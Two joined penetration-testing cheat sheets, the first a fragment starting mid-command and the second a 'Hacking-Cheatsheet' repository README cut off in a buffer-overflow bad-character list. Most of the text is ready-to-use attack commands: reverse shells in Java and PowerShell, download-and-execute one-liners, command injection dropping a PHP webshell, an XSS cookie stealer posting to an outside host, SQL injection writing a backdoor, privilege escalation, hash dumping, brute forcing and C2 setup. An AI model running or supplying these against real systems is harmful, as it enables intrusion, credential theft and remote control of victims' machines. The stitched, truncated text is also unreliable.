/home/tempuser/.ssh/authorized_keys $ chown -R tempuser:tempuser /home/tempuser/.ssh # create reverse ssh shell $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@<attacker_ip>" ``` ### Patator is a multi-purpose brute-forcer ``` # git clone https://github.com/lanjelot/patator.git /usr/share/patator # SMTP bruteforce $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst $ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name' ``` ### Metasploit Web terminal via Gotty ``` $ service postgresql start $ msfdb init $ apt-get install golang $ mkdir /root/gocode $ export GOPATH=/root/gocode $ go get github.com/yudai/gotty $ gocode/bin/gotty -a 127.0.0.1 -w msfconsole # open in browser http://127.0.0.1:8080 ``` ### Get full shell with POST RCE ``` attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http://victum.tk/command.php' attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http://victum.tk/command.php' attacker:~$ curl http://victum.tk/shell.php?cmd=id # download reverse shell to server (phpshell.php) http://victum.tk/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http://attacker.tk/phpshell.txt%22,%20%27r%27%29%29;%27 # run nc and execute phpshell.php attacker:~$ nc -nvlp 1337 ``` ### Exiftool - Read and write meta information in files ``` $ wget http://www.sno.phy.queensu.ca/~phil/exiftool/Image-ExifTool-10.13.tar.gz $ tar xzf Image-ExifTool-10.13.tar.gz $ cd Image-ExifTool-10.13 $ perl Makefile.PL $ make $ ./exiftool main.gif ``` ### Get SYSTEM with Admin reverse_shell on Win7 ``` msfvenom โ€“p windows/shell_reverse_tcp LHOST=192.168.56.102 โ€“f exe > danger.exe #show account settings net user <login> # download psexec to kali https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx # upload psexec.exe file onto the victim machine with powershell script echo $client = New-Object System.Net.WebClient > script.ps1 echo $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1 echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1 # upload danger.exe file onto the victim machine with powershell script echo $client = New-Object System.Net.WebClient > script2.ps1 echo $targetlocation = "http://192.168.56.102/danger.exe" >> script2.ps1 echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1 # UAC bypass from precompiled binaries: https://github.com/hfiref0x/UACME # upload https://github.com/hfiref0x/UACME/blob/master/Compiled/Akagi64.exe to victim pc with powershell echo $client = New-Object System.Net.WebClient > script2.ps1 echo $targetlocation = "http://192.168.56.102/Akagi64.exe" >> script3.ps1 echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> script3.ps1 powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1 # create listener on kali nc -lvp 4444 # Use Akagi64 to run the danger.exe file with SYSTEM privileges Akagi64.exe 1 C:\Users\User\Desktop\danger.exe # create listener on kali nc -lvp 4444 # The above step should give us a reverse shell with elevated privileges # Use PsExec to run the danger.exe file with SYSTEM privileges psexec.exe โ€“i โ€“d โ€“accepteula โ€“s danger.exe ``` ### Get SYSTEM with Standard user reverse_shell on Win7 ``` https://technet.microsoft.com/en-us/security/bulletin/dn602597.aspx #ms15-051 https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html https://www.exploit-db.com/exploits/37049/ # check the list of patches applied on the target machine # to get the list of Hotfixes installed, type in the following command. wmic qfe get wmic qfe | find "3057191" # Upload compile exploit to victim machine and run it https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe # by default exploite exec cmd.exe with SYSTEM privileges, we need to change source code to run danger.exe # https://github.com/hfiref0x/CVE-2015-1701 download it and navigate to the file "main.c" # dump clear text password of the currently logged in user using wce.exe http://www.ampliasecurity.com/research/windows-credentials-editor/ wce -w # dump hashes of other users with pwdump7 http://www.heise.de/download/pwdump.html # we can try online hash cracking tools such crackstation.net ``` ### Generate our own dic file based on the website content ``` $ cewl -m 4 -w dict.txt http://site.url $ john --wordlist=dict.txt --rules --stdout ``` ### Bruteforce DNS records using Nmap ``` $ nmap --script dns-brute --script-args dns-brute.domain=foo.com,dns-brute.threads=6,dns-brute.hostlist=./hostfile.txt,newtargets -sS -p 80 $ nmap --script dns-brute www.foo.com ``` ### Identifying a WAF with Nmap ``` $ nmap -p 80,443 --script=http-waf-detect 192.168.56.102 $ nmap -p 80,443 --script=http-waf-fingerprint 192.168.56.102 $ wafw00f www.hamza.com ``` ### MS08-067 - without the use of Metasploit ``` $ nmap -v -p 139, 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.31.205 $ searchsploit ms08-067 $ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1 ``` ### Nikto scan with SQUID proxy ``` $ nikto -useproxy http://squid_ip:3128 -h http://target_ip ``` ### Hijack a binaryโ€™s full path in bash to exec your own code ``` $ function /usr/bin/foo () { /usr/bin/echo "It works"; } $ export -f /usr/bin/foo $ /usr/bin/foo # It works ;) ``` ### Local privilege escalation through MySQL run with root privileges ``` # Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu) $ wget 0xdeadbeef.info/exploits/raptor_udf2.c $ gcc -g -c raptor_udf2.c $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc mysql -u root -p mysql> use mysql; mysql> create table foo(line blob); mysql> insert into foo values(load_file('/home/user/raptor_udf2.so')); mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; mysql> create function do_system returns integer soname 'raptor_udf2.so'; mysql> select * from mysql.func; mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out'); user:~$ su - Password: user:~# whoami root root:~# id uid=0(root) gid=0(root) groups=0(root) ``` ### Bruteforce SSH login with patator ``` root:~# patator ssh_login host=192.168.0.18 user=FILE0 password=FILE1 0=word.txt 1=word.txt -x ignore:mesg='Authentication failed.' ``` ### Using LD_PRELOAD to inject features to programs ``` $ wget https://github.com/jivoi/pentest/ldpreload_shell.c $ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so $ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft ``` ### Exploit the OpenSSH User Enumeration Timing Attack ``` # https://github.com/c0r3dump3d/osueta $ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes $ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes โ€“dos no -L userfile.txt ``` ### Create a TCP circuit through validly formed HTTP requests with ReDuh ``` # https://github.com/sensepost/reDuh # step 1 # upload reDuh.jsp to victim server $ http://192.168.10.50/uploads/reDuh.jsp # step 2 # run reDuhClient on attacker $ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp # step 3 # connecting to management port with nc $ nc -nvv 127.0.0.1 1010 # step 4 # forward localport to remote port with tunnel [createTunnel] 7777:172.16.0.4:3389 # step 5 # connect to localhost with rdp $ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777 ``` # Jenkins Reverse Shell ``` String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` # Powershell Reverse Shell change IP and Port / Limmited version ``` $sm=(New-Object Net.Sockets.TCPClient('192.168.1.11',9001)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} ``` # Donwload file to Victim machine ``` cmd /c certutil -urlcache -split -f http://127.0.0.1/shell.exe c:\Temp\shell.exe && C:\temp\shell.exe ``` ``` powershell -v 2 -exec bypass IEX(New-Object Net.WebClient).downloadString("http://127.0.0.1/shell.ps1") ``` # MSSQL attack ## Service discovery **Nmap** ``` nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 ``` **MetaSploit** ``` msf > use auxiliary/scanner/mssql/mssql_ping ``` Enumeration Combine user passwords collected in other ways into a dictionary to enumerate MSSQL machines in the domain. **Nmap** ``` nmap -n -sV -Pn -vv -p<PORT> --script=banner,ms-sql-empty-password,ms-sql-dac,ms-sql-dump-hashes,ms-sql-info,ms-sql-ntlm-info,vulners -oA <IP>_mssql.txt <IP> nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=user.txt,passdb=pass.txt 192.168.1.1 nmap -p 1433 --script ms-sql-brute --script-args userdb=user.txt,passdb=pass.txt 192.168.1.1 Hydra hydra -L userlist_sqlbrute.txt -P quick_password_spray.txt -f -o output.ms-sql -u <IP> -s <PORT> ``` **MetaSploit** ``` msf > use auxiliary/admin/mssql/mssql_enum msf > use auxiliary/scanner/mssql/mssql_login Set it up PASS_FILE and RHOSTS. ``` **PowerUpSQL** ``` Invoke-SQLAuditWeakLoginPw ``` **FScrack** ``` python FScrack.py -h 192.168.1 -p 1433 -d pass.txt ``` ## Exploitation **Nmap** ``` nmap -p 445 --script ms-sql-discover,ms-sql-empty-password,ms-sql-xp-cmdshell 192.168.1.10 nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami" 192.168.1.10 ``` **MetaSploit** ``` msf > auxiliary/admin/mssql/mssql_exec msf > auxiliary/admin/mssql/mssql_sql Rebound msf > use exploit/windows/mssql/mssql_payload msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp ``` **MSDAT** All the included above could be tested using MSDAT only. <br> Getting a shell ``` msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell mssql_shell python script ``` **python [mssql_shell.py](https://github.com/Alamot/code-snippets/blob/master/mssql/mssql_shell.py) script** ``` Usage : mssql_shell Change MSSQL_SERVE , MSSQL_USERNAME and MSSQL_PASSWORD ``` **Sqsh** <br> Connect to the service ``` sqsh -S mssql -D MyDB -U DOMAIN\\testuser -P MyTestingClearPassword1 ``` Then ``` exec sp_configure โ€˜show advanced optionsโ€™, 1 go reconfigure go exec sp_configure โ€˜xp_cmdshellโ€™, 1 go reconfigure go xp_cmdshell 'dir C:\' go ``` # C&C ## Merlin Compile and run server ``` $ cd merlin/cmd/merlinserver $ go build $ sudo ./merlinServer-Linux-x64 -i 192.168.1.11 -p 8443 ``` Compile agent ``` $ cd merlin/cmd/merlinagent $ sudo GOOS=windows GOARCH=386 go build ``` Generate Certificate ``` $ cd merlin/data/x509 $ openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=lab.com" -days 365 ``` ## Koadic ``` $ cd koadic $ ./koadic / \ _ _ | | | | _____ __ _ __| || | ___ | |/ / _ \ / _` |/ _` ||.| / __| | / (o) | (_| | (_| ||.|| (__ |_|\_\_^_/ \__,_|\__,_||:| \___| |:| ~\==8==/~ 8 O -{ COM Command & Control }- Windows Post-Exploitation Tools Endless Intellect ~[ Version: 0xA ]~ ~[ Stagers: 5 ]~ ~[ Implants: 33 ]~ (koadic: sta/js/mshta)$ info NAME VALUE REQ DESCRIPTION ----- ------------ ---- ------------- SRVHOST 192.168.1.11 yes Where the stager should call home SRVPORT 9999 yes The port to listen for stagers on EXPIRES no MM/DD/YYYY to stop calling home KEYPATH no Private key for TLS communications CERTPATH no Certificate for TLS communications MODULE no Module to run once zombie is staged (koadic: sta/js/mshta)$ set SRVPORT 1245 [+] SRVPORT => 1245 (koadic: sta/js/mshta)$ run [+] Spawned a stager at http://192.168.1.11:1245/c26qp [!] Don't edit this URL! (See: 'help portfwd') [>] mshta http://192.168.1.11:1245/c26qp ``` # PHP Tiny Webshell ``` <?= ($_=@$_GET[0]).$_(@$_GET[1]); ``` http://127.0.0.1/shell.php?0=system&1=ls # Donwload file to the victim machine ``` bitsadmin /transfer mydownloadjob /download /priority normal ^http://example.com/filename.zip C:\Users\username\Downloads\filename.zip ``` # Internal Monolog Retrieving NTLM Hashes without Touching LSASS https://github.com/eladshamir/Internal-Monologue # NTDS - Domain Controller Dumping and enumerating NTDS.dit - a file that contains information about Active Directory users (hashes!). ``` powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q" ``` Dump hashes ``` /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local ``` # Interactive shell with nc ``` rlwrap nc -nlvp PORT ``` # Tipis and tricks ### RCE POC We can use the folloiwng tricks as an RCE POC(in some engagements, the client asks for a limited tests on RCE POCs). ## Ping Pentester machine ```bash tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8 ``` Under the exploit run ```bash ping <Attacker-IP> ``` You can specify a number of pings with -c agrments, If ICMP requests recieved, RCE achieved ## Curl Execute commands and recieve data with the POST request ```bash curl -d "$(id)" 127.0.0.1:9988 ``` Recieve data ```bash nc -nlvp 9988 ``` ## Burpsuite Collaborator Use burpcollaborator as POC * Linux ```bash curl <burp-collaborator.com> ``` * Windows ```bash mshta <burp-collaborator.com> ```
# Hacking-Cheatsheet In this repo I collect all commands, links, techniques and tricks I found during my work as pentester, hacker, OSCP student and hack the box fan. # Basic Linux stuff you may need Keyword search in man pages: ```bash man -k <KEYWORD> ``` Alternatively: ```bash apropos <KEYWORD> ``` ## Find stuff ```bash sudo find / -name <SEARCHTERM> ``` ## Environment variables basic environment variables you may need: ```bash $PATH #Search Paths $USER #Username $PWD #Current working directory $HOME #Homedirectory ``` get all environment variables: ```bash env ``` ## Bash history saved to ~/.bash_history show bash history: ```bash history ``` # External Enumeration ## OSINT ### Whois Forward / Reverse Search with whois ```bash whois <DOMAIN> / <IP> ``` ### Crawl words from website for passwordlist ```bash cewl <domain> -m 6 -w words.txt ``` ### The Harvester Find Domains, E-Mail-Adresses, Subdomains, ... ``` theharvester -d <DOMAIN> -b <DATASOURCE> ``` ## DNS Enumeration ```bash # Look for A record / IP Address host <DOMAIN> # Look for MX record / mailservers host -t mx <DOMAIN> # Look for TXT record host -t txt <DOMAIN> # get Nameservers for Domain host -t ns <DOMAIN> ``` ### DNS forward lookup brute force Needs a list with possible sub domains (e.g. use seclist [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists)) ```bash for ip in $(cat <FILENAME>); do host $ip.<DOMAIN>; done ``` ### DNS reverse lookup brute force ```bash for ip in $(seq <START> <END>); do host <IP-BEGINNING>.$ip; done | grep -v "not found" ``` ### DNS zone transfers ```bash host -l <DOMAIN NAME> <DNS SERVER> ``` #### DNS zone transfer automation script ```bash #!/bin/bash if [ -z "$1" ]; then echo "[*] Zone transfer script" echo "[*] Usage : $0 <DOMAIN> " exit 0 fi for server in $(host -t ns $1 | cut -d " " -f4;) do host -l $1 $server | grep "has address" done ``` ### DNSRecon DNS zone transfer: ```bash dnsrecon -d <DOMAIN> -t axfr ``` Bruteforce subdomains: ```bash dnsrecon -d <DOMAIN> -D <LISTNAME.txt> -t brt ``` ### DNSEnum Tries zone transfer, also can use bruteforce for subdomains ```bash dnsenum <DOMAIN> ``` ### NMAP DNS NSE scripts ```bash nmap --script=dns-zone-transfer -p 53 <TARGET> ``` ## Port-Scanning ### Nmap #### TCP Scans If nmap has access to raw sockets (run with sudo), nmap uses a SYN-Scan by default. Without sudo privileges: TCP-Connect-Scan. TCP-Connect-Scan takes much longer time than SYN-Scan. Nmap scans 1000 most common ports by default. To be sure to use SYN/Stealth scan: ```bash sudo nmap -sS <IP> ``` Scan all ports with service and OS detection ```bash sudo nmap -v -A -p- <Target-IP> ``` #### UDP Scans ```bash sudo nmap -sU <IP> ``` #### combined TCP / UDP Scan ```bash sudo nmap -sU -sS <IP> ``` #### Network Sweeping ```bash nmap -sn <IP-START>.1-254 #e.g. nmap -sn 10.10.10.1-254 ``` Save network sweep / ping sweep result in grepable format to file ```bash nmap -v -sn <IP-Start>.1-254 -oG <FILENAME> grep Up <FILENAME> | cut -d " " -f 2 | head ``` TCP connect scan to top 20 ports with OS and version detection: ```bash nmap -sT -A --top-ports=20 <IP-Start>.1-254 -oG <FILENAME> ``` ### Basic port-Scanning with netcat/nc (TCP) ```bash nc -nvv -w 1 -z <IP> <STARTPORT>-<ENDPORT> ``` ### Basic port-Scanning with netcat/nc (UDP) ```bash nc -nv -u -w 1 -z <IP> <STARTPORT>-<ENDPORT> ``` ## Masscan ```bash sudo masscan -p<PORT> <SUBNET>/<NETMASK> --rate=1000 -e <INTERFACE> --router-ip <IP OF GATEWAY> ``` ## Webserver Enumeration ### Vhost Enumeration ``` nmap --script=http-vhosts --script-args domain=<DOMAIN> -p80,443 -v <Target/DOMAIN> ``` ## SMB-Enumeration Get NetBIOS Information ```bash sudo nbtscan -r <SUBNET>/<NETMASK> ``` ### Enum4Linux ```bash enum4linux -a <IP> ``` ### rpcclient ```bash rpcclient -U "" <Target IP> ``` enter empty password Commands in rpcclient console: - srvinfo: Identify OS Versions - enumdomusers: List of Usernames on this server - getdompwinfo: Displays SMB password policy ### CrackMapExec List of Users and Passwords to try: ```bash crackmapexec smb <IP> -u users.txt -p passwords.txt ``` Login to WinRM (Alternative to evil-winrm): ```bash crackmapexec winrm <IP> -u <USER> -p <PASSWORD> ``` Hint: User needs to be in group "Remote Management Users" Brute Usernames through RID ```bash crackmapexec smb <IP> -u <USER> -p <PASSWORD> --rid-brute ``` ### NMAP SMB NSE Scripts Determine operating system by SMB service: ```bash nmap <IP> --script=smb-os-discovery ``` ## NFS Enumeration Find to rpcbind registered services ```bash nmap -sV -p 111 --script=rpcinfo <START-IP>.1-254 ``` ### NMAP NFS enum scripts ```bash nmap -p 111 --script nfs* <IP> ``` ### Mount NFS shares ```bash sudo mount -o nolock <IP>:/<SHARENAME> <LOCALMOUNTDIR> ``` If a file is not accessible on the share because it's limited to a specific user with a specific uuid: try to create a user with this uuid. Then su to this user and try to access the file. ## SMTP-Enumeration SMTP-Enumeration with netcat ```bash for user in $(cat typical_usernames_SMTP_Enumeration.txt); do echo VRFY $user |nc -nv -w 1 <Target-IP> 25 2>/dev/null |grep ^"250";done ``` SMTP-Enumeration Script TODO: extend for reading users from file ```python #!/usr/bin/python import socket import sys if len(sys.argv) != 2: print "Usage: vrfy.py <username>" sys.exit(0) # Create a Socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Connect to the Server connect = s.connect(('<IP>',25)) # Receive the banner banner = s.recv(1024) print banner # VRFY a user s.send('VRFY ' + sys.argv[1] + '\r\n') result = s.recv(1024) print result # Close the socket s.close() ``` ## SNMP-Enumeration Scan for open SNMP ports with nmap ```bash sudo nmap -sU --open -p 161 <START-IP>.1-254 -oG <FILENAME> ``` Enumerate set of IPs for different SNMP communities ```bash onesixtyone -c community_names.txt -i ips.txt ``` examples for community names: - public - private - manager For following examples often "public" is used as community string. Get all SNMP info ```bash snmpwalk -c <COMMUNITY-STRING> -v1 -t 10 <TARGET-IP> ``` Enumerate Users on Windows System ```bash snmpwalk -c <COMMUNITY-STRING> -v1 <TARGET-IP> 1.3.6.1.4.1.77.1.2.25 ``` Get list of running Windows processes ```bash snmpwalk -c <COMMUNITY-STRING> -v1 <TARGET-IP> 1.3.6.1.2.1.25.4.2.1.2 ``` Get list of open ports ```bash snmpwalk -c <COMMUNITY-STRING> -v1 <TARGET-IP> 1.3.6.1.2.1.6.13.1.3 ``` Get list of installed software ```bash snmpwalk -c <COMMUNITY-STRING> -v1 <TARGET-IP> 1.3.6.1.2.1.25.6.3.1.2 ``` ## Wordpress Enumeration ```bash wpscan --update wpscan --url <TARGET-URL> ``` ## Webapplication Enumeration - check source code for any comments and interesting scripts - check robots.txt - check sitemaps (/sitemap.xml) - check admin consoles ### dirb ```bash dirb <URL> -z 10 ``` ### dirbuster Similar to dirb but with GUI ### ffuf - fuzz faster u fool TODO: insert command ### Webapplication Vulnerability Scan / nikto ```bash nikto -host=<URL> ``` # File Transfer and File Downloads ## Windows ### Download files with certutil ```cmd certutil.exe -urlcache -f http://<ip>:<port>/<filename> <localfilename> ``` Example: ```cmd certutil.exe -urlcache -f http://10.10.14.37:8080/shell.exe reverse_shell.exe ``` ### Downlaod files with Powershell Oneliner: ```cmd powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<IP>:<PORT>/<FILE>','<TARGET-FILENAME>')" ``` Powershell-Script: ```cmd echo $storageDir = $pwd > wget.ps1 echo $webclient = New-Object System.Net.WebClient >>wget.ps1 echo $url = "http://192.168.30.5/exploit.exe" >>wget.ps1 echo $file = "new-exploit.exe" >>wget.ps1 echo $webclient.DownloadFile($url, $file) >>wget.ps1 ``` ### Powercat Filetransfer ```powershell PS> powercat -c <IP> -p <PORT> -i <FILENAME> ``` Execute File with: [Execute Powershell File, bypass all policies](#execute-powershell-file-bypass-all-policies) ## Linux ### wget ```bash wget -O <filename.xyz> http://<URL>/ ``` ### curl ```bash curl -o <filename.xyz> http://<URL>/ ``` ### axel (very fast downloader (-n # gives number of connections)) ```bash axel -a -n 20 -o <filename.xyz> http://<URL>/ ``` ## nc / netcat File receiver: ``` nc -nlvp 4444 > <FILENAME> ``` File sender: ``` nc -nv <IP> <PORT> < <FILENAME> ``` ## socat File sender: ```bash socat TCP4-LISTEN:<PORT>,fork file:<FILENAME.xyz> ``` File receiver: ``` socat TCP4:<IP>:<PORT> file:<FILENAME>,create ``` ## Python Webserver Create webserver listening to port 9090 offering files from current working directory ```bash python3 -m http.server 9090 python -m SimpleHTTPServer 9090 ``` ## PHP Webserver ```bash php -S 0.0.0.0:9090 ``` ## Ruby Webserver ```bash ruby -run -e httpd . -p 9090 ``` - the "." defines use of current directory as root directory for server ## Busybox Webserver ```bash busybox httpd -f -p 9090 ``` # Exploiting ## Metasploit Magic ### MSFvenom / Metasploit payloads ```bash # Windowssystem, reverse tcp ==> use for Buffer Overflows msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<IP> -f c # same as above but without bad characters and encoding msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<IP> -f c -e x86/shikata_ga_nai -b "<BADCHARS>" # example for BADCHARS: "\x00\x0a\x25\x26\x2b\x3d" # Don't break the application you exploit: msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<IP> EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "<BADCHARS>" # Windowssystem, e.g. with IIS msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx > shell.aspx # e.g. Apache Webserver with PHP (don't forget to remove comment at the beginning) msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php ``` ### Metasploit local exploit suggester Change to a writeable directory before usage for better results. ```bash meterpreter> run post/multi/recon/local_exploit_suggester ``` ## Webshells Webshells are in the following directory on Kali: /usr/share/webshells ## Cross-Site-Scripting (XSS) ```javascript <script>alert('Happy Hacking')</script> ``` ### Content Injection ```html <iframe src=<URL> height="0" width="0"></iframe> ``` ### XSS Cookie Stealer ```javascript <script>new Image().src="http://x.x.x.x/stealer.jpg?output="+document.cookie;<script> ``` ## PHP Remote Command/Code Execution (through Local File Inclusion) Send the following payload as request to webserver with e.g. nc. Possibly the webserver logs the request. ```php <?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?> ``` After that use Local File Inclusion (LFI) to request a site, include the logfile and use the parameter "&cmd=\<COMMAND\>" to execute os commands. ### PHP Data Wrapper Given String is used like a file content for LFIs. (No need to write/manipulate files on webserver) ``` data:text/plain,<TESTSTRING> data:text/plain,<?php echo shell_exec("dir") ?> ``` ## SQL Injections ### Authentication Bypass ```SQL select * from users where name = '<USER>' or 1=1;#' and password = '<ANYTHING>'; select * from users where name = '<USER>' or 1=1 LIMIT 1;#' and password = '<ANYTHING>'; select * from users where name = '<USER>' or 1=1;--' and password = '<ANYTHING>'; select * from users where name = '<USER>' or 1=1 LIMIT 1;--' and password = '<ANYTHING>'; ``` ### Detect number of columns for UNION attack: add a ```SQL ORDER BY 1-- ``` statement to sql command. Than increase number after ORDER BY until you receive a error => Value before is the correct number of columns for UNION statement. ### Detect which columns are shown ```SQL =1 union all select 1, 2, 3, ... ``` ### Get Data from database ```SQL =1 union all select 1, 2, @@version =1 union all select 1, 2, user() =1 union all select 1, 2, table_name from information_schema.tables =1 union all select 1, 2, column_name from information_schema.columns where table_name='users' =1 union all select 1, username, password from users ``` ### SQL Injection to Code Execution Read files from filesystem: ```SQL =1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts') ``` Write files to filesystem: ```SQL =1 union all select 1, 2,"<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>" into OUTFILE 'c:/wwwdirectory/backdoor.php' ``` After that call the file with cmd parameter: http://\<URL\>/backdoor.php?cmd=\<COMMAND\> ### Automated SQL Injections / Sqlmap ```bash sqlmap -u http://<URL>/file.php?id=1 -p "id" ``` use recorded request from burp with sqlmap: ```bash sqlmap -r <FILENAME> ``` #### Dump database with sqlmap ```bash sqlmap -u http://<URL>/file.php?id=1 -p "id" --dbms=<DBMS> --dump ``` This also creates csv files with the data. #### Code Execution with sqlmap ```bash sqlmap -u http://<URL>/file.php?id=1 -p "id" --dbms=<DBMS> --os-shell ``` ## Wordpress Exploiting When you have valid admin credentials for Wordpress installation use following script to generate malicious plugin and uploading the generated plugin to WP. [https://github.com/wetw0rk/malicious-wordpress-plugin/blob/master/wordpwn.py](https://github.com/wetw0rk/malicious-wordpress-plugin/blob/master/wordpwn.py) ## Creating Exploits with msfvenom ### Web Payloads #### PHP Meterpreter ```bash msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php ``` Don't forget to remove the starting chars of the generated file. ## Buffer Overflows ### Registers |Short|Register description| |--|--| |EAX|Arithmetical and Logical Instructions| |EBX|Base Pointer for Memory Addresses| |ECX|Loop, Shift, Rotation Counter| |EDX|I/O Port Addressing, Multiplication, Division| |ESI|Pointer of data and source in string copy operations| |EDI|Pointer of data and destination in string copy operations| |![registers.png](images/registers.png)| |:--:| |Register in Detail| ### Pointers |Pointer|Description| |--|--| |ESP|keeps track of rhe most recently referenced location on the stack (pointer to it)| |EBP|Pointer to top of the stack| |EIP|Points to next code instruction to be executed| ### Immunity Debugger Shortcuts |Key|Action| |--|--| |F2|Set Breakpoint| |F7|Step into| |F8|Step Over| |F9|Run| ### Buffer Overflow #### Replicating the Crash - generate a unique payload with pattern_create and send this as payload to vulnerable application. See: [here](#create-unique-pattern) - EIP will be overwritten by a unique string - Call pattern_offset with length of generated string and the pattern you find in the EIP to get the correct offset. See: [here](#find-unique-pattern-offset) #### Controlling EIP - verify the offset by creating a payload: ```python filler = "A" * <DETECTED-OFFSET> eip = "B" * 4 buffer = "C" * (<PAYLOAD LENGTH FROM PoC> - len(filler) - len(eip)) inputBuffer = filler + eip + buffer ``` #### Locating Space for Shellcode - reverse shell needs about 350-400 Bytes of space - try to verify if there's enough space fo the reverse shell in stack ```python filler = "A" * <DETECTED-OFFSET> eip = "B" * 4 offset = "C" * 4 buffer = "D" * (<INCREASED PAYLOAD LENGHT> - len(filler) - len(eip) - len(offset)) inputBuffer = filler + eip + offset + buffer ``` #### Checking for bad characters - characters that break the program flow (e.g. 0x00 (ends strings in C), 0x0D (carriage return - ends fields in http), 0x0A (line feed - ends fields in http)) - You can use the following string to determine badchars: ```python badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 